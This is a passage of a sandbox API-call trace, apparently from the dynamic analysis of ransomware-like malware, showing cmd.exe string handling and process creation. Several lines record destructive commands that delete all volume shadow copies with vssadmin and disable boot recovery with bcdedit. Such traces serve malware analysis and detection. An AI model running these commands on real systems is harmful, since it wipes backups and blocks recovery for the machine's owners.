_Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f69c | out: _Buffer=" /set {default} recoveryenabled no ") returned 36 [0190.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.499] GetFileType (hFile=0x7) returned 0x2 [0190.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.499] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f65c | out: lpMode=0x28f65c) returned 1 [0190.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.500] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x28f688, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f688*=0x24) returned 1 [0190.500] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x28f6b8 | out: _Buffer=" & ") returned 3 [0190.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.500] GetFileType (hFile=0x7) returned 0x2 [0190.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.500] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f678 | out: lpMode=0x28f678) returned 1 [0190.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.500] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f6a4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6a4*=0x3) returned 1 [0190.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.500] GetFileType (hFile=0x7) returned 0x2 [0190.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.501] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f664 | out: lpMode=0x28f664) returned 1 [0190.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.501] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x480810*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x28f690, lpReserved=0x0 | out: lpBuffer=0x480810*, lpNumberOfCharsWritten=0x28f690*=0xb) returned 1 [0190.501] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f69c | out: _Buffer=" /set {default} bootstatuspolicy ignoreallfailures ") returned 51 [0190.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.501] GetFileType (hFile=0x7) returned 0x2 [0190.501] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.501] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f65c | out: lpMode=0x28f65c) returned 1 [0190.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.501] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x28f688, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f688*=0x33) returned 1 [0190.502] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0190.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.502] GetFileType (hFile=0x7) returned 0x2 [0190.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.502] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0190.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.502] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0190.502] GetConsoleTitleW (in: lpConsoleTitle=0x28f228, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.502] GetFileAttributesW (lpFileName="cmd.exe" (normalized: "c:\\users\\eebsym5\\desktop\\cmd.exe")) returned 0xffffffff [0190.503] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0190.503] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0190.503] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0190.503] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0190.503] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0190.503] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0190.503] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0190.503] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0190.503] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0190.503] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0190.503] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0190.503] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0190.503] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0190.503] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0190.503] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0190.503] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0190.503] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0190.503] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0190.503] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0190.503] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0190.503] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0190.503] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0190.503] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0190.503] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0190.503] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0190.503] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0190.503] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0190.503] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0190.503] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0190.503] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0190.504] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0190.504] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0190.525] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0190.525] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0190.525] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0190.525] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0190.525] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0190.525] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0190.525] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0190.525] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0190.525] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0190.525] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0190.525] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0190.525] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0190.525] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0190.525] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0190.525] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0190.525] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0190.525] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0190.525] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0190.525] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0190.525] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0190.525] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0190.525] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0190.525] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0190.525] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0190.525] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0190.525] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0190.525] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0190.525] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0190.526] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0190.526] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0190.526] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0190.526] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0190.526] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0190.526] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0190.526] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0190.526] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0190.526] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0190.526] _wcsicmp (_String1="cmd", _String2="FOR") returned -3 [0190.526] _wcsicmp (_String1="cmd", _String2="IF") returned -6 [0190.526] _wcsicmp (_String1="cmd", _String2="REM") returned -15 [0190.526] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.526] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.526] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x28eae4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eae4) returned 0xffffffff [0190.526] GetLastError () returned 0x2 [0190.526] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\cmd.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28eac4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac4) returned 0xffffffff [0190.527] GetLastError () returned 0x2 [0190.527] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x28eac4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac4) returned 0xffffffff [0190.527] GetLastError () returned 0x2 [0190.527] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x28eae4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eae4) returned 0x4921a8 [0190.527] FindClose (in: hFindFile=0x4921a8 | out: hFindFile=0x4921a8) returned 1 [0190.527] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0190.527] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0190.527] GetConsoleTitleW (in: lpConsoleTitle=0x28efbc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.527] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee44, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef0c | out: lpAttributeList=0x28ee44, lpSize=0x28ef0c) returned 1 [0190.527] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee44, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef04, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee44, lpPreviousValue=0x0) returned 1 [0190.527] GetStartupInfoW (in: lpStartupInfo=0x28ee00 | out: lpStartupInfo=0x28ee00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.527] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.527] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /C vssadmin.exe delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28eea0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cmd.exe /C vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28eeec | out: lpCommandLine="cmd.exe /C vssadmin.exe delete shadows /all /quiet ", lpProcessInformation=0x28eeec*(hProcess=0x58, hThread=0x54, dwProcessId=0x890, dwThreadId=0x85c)) returned 1 [0190.529] CloseHandle (hObject=0x54) returned 1 [0190.529] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.529] GetEnvironmentStringsW () returned 0x490940* [0190.529] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0190.529] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0193.923] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28ede0 | out: lpExitCode=0x28ede0*=0x2) returned 1 [0193.923] CloseHandle (hObject=0x58) returned 1 [0193.924] _vsnwprintf (in: _Buffer=0x28ef28, _BufferCount=0x13, _Format="%08X", _ArgList=0x28edec | out: _Buffer="00000002") returned 8 [0193.924] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0193.924] GetEnvironmentStringsW () returned 0x490940* [0193.924] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0193.924] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.924] GetEnvironmentStringsW () returned 0x490940* [0193.924] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0193.924] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ee44 | out: lpAttributeList=0x28ee44) [0193.924] GetConsoleTitleW (in: lpConsoleTitle=0x28f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.924] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\eebsym5\\desktop\\bcdedit.exe")) returned 0xffffffff [0193.924] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0193.924] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0193.924] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0193.924] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0193.924] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0193.924] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0193.924] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0193.924] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0193.924] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0193.924] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0193.924] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0193.924] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0193.925] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0193.925] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0193.925] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0193.925] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0193.925] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0193.925] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0193.925] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0193.925] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0193.925] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0193.925] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0193.925] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0193.925] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0193.925] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0193.925] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0193.925] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0193.925] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0193.926] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0193.926] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0193.926] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0193.926] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0193.926] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0193.926] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0193.926] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0193.926] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0193.926] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0193.926] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0193.926] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0193.926] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0193.926] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0193.926] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0193.926] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0193.926] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0193.926] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0193.926] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0193.926] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0193.926] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0193.926] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0193.926] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0193.926] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0193.926] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0193.926] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0193.926] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0193.926] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0193.926] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0193.926] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.926] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0193.926] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.927] FindClose (in: hFindFile=0x490ba0 | out: hFindFile=0x490ba0) returned 1 [0193.927] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0193.927] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0193.927] GetConsoleTitleW (in: lpConsoleTitle=0x28ef58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.927] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ede0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28eea8 | out: lpAttributeList=0x28ede0, lpSize=0x28eea8) returned 1 [0193.927] UpdateProcThreadAttribute (in: lpAttributeList=0x28ede0, dwFlags=0x0, Attribute=0x60001, lpValue=0x28eea0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ede0, lpPreviousValue=0x0) returned 1 [0193.927] GetStartupInfoW (in: lpStartupInfo=0x28ed9c | out: lpStartupInfo=0x28ed9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0193.927] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0193.927] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {default} recoveryenabled no ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ee3c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit.exe /set {default} recoveryenabled no ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ee88 | out: lpCommandLine="bcdedit.exe /set {default} recoveryenabled no ", lpProcessInformation=0x28ee88*(hProcess=0x54, hThread=0x58, dwProcessId=0xa5c, dwThreadId=0xa3c)) returned 1 [0194.736] CloseHandle (hObject=0x58) returned 1 [0194.737] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0194.737] GetEnvironmentStringsW () returned 0x4a0548* [0194.737] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0194.737] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0195.104] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ed7c | out: lpExitCode=0x28ed7c*=0x0) returned 1 [0195.104] CloseHandle (hObject=0x54) returned 1 [0195.104] _vsnwprintf (in: _Buffer=0x28eec4, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ed88 | out: _Buffer="00000000") returned 8 [0195.104] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0195.104] GetEnvironmentStringsW () returned 0x4a0548* [0195.104] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0195.104] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.104] GetEnvironmentStringsW () returned 0x4a0548* [0195.104] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0195.104] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ede0 | out: lpAttributeList=0x28ede0) [0195.104] GetConsoleTitleW (in: lpConsoleTitle=0x28f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.105] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\eebsym5\\desktop\\bcdedit.exe")) returned 0xffffffff [0195.105] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0195.105] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0195.105] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0195.105] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0195.105] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0195.105] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0195.105] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0195.105] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0195.105] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0195.105] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0195.105] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0195.105] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0195.105] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0195.105] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0195.105] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0195.105] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0195.105] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0195.105] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0195.105] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0195.105] _wcsicmp (_String1="bcdedit", _String2="EXIT") 